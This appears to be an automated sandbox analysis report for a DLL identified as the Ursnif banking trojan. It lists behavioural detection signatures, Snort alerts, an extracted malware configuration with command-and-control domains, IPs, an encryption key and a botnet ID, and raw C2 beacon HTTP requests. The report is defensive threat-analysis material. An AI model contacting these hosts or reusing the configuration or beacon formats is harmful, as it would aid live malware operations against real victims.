Windows Analysis Report 2790000.dll

Overview

General Information

Sample Name:	2790000.dll
Analysis ID:	444655
MD5:	c40709736c45151601de6db50f379d8b
SHA1:	96fcdac225106f13726477d898a4939ccfcd4781
SHA256:	56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: 2790000.dll

Avira: detected

Found malware configuration

Source: 00000007.00000002.936762270.00000000033D0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}

Machine Learning detection for sample

Source: 2790000.dll

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.loaddll32.exe.10000000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 7.2.rundll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0462F8CE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_0462FD33 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

3_2_0462FD33

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49782 -> 40.97.116.82:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49866 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49882 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49884 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49886 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49888 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49896 -> 45.90.58.179:80

Performs DNS queries to domains with low reputation

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source:	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: taybhctdyehfhgthp2.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.97.144.178 52.97.144.178
Source: Joe Sandbox View	IP Address: 40.101.81.146 40.101.81.146

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GREENFLOID-ASUA GREENFLOID-ASUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; lang=en
Source: global traffic	HTTP traffic detected: GET /jdraw/nCtz8Lq6aEDL_2BsA7Qn5/Dev5sCookYywtQ9z/nG7suU6eaLynJDf/6nVlQrTedw14SsFLaP/dONDpCANh/eFyKJLQSVfXFPwoYfc_2/Fxcw2VZX7ufzKzV_2B_/2BcmZDAxHE9PqdJN_2FqrA/xpLUjN90HazXC/umw6oByt/_2BMDLnSdL9xoOnOquolygh/AYKttn5cY4/7XRs5_2FBpnYMuiL1/LLL0Aa3xG7M/waJBx6.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/P4wQs6220jnbtlIYjS/M_2BrTOFK/S5ZrWVsOjLJpN_2FedVX/CBkwP5kzII66fKYw3z_/2FjIng5PhqmFkUxpfJCyXT/oTx8Wl7oZau6V/473q3ztH/dQPwZCOMD_2BpYilPiiz4nZ/uZIwiZ0fko/kjMIGTqZ5JCk_2FS0/Gy_2FwKsvZXz/cjy_2FkTVRx/BwPtRyW55ulGu6/1jq9nBFzw/u.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic	HTTP traffic detected: GET /jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000002F.00000003.894371427.00000251C410A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
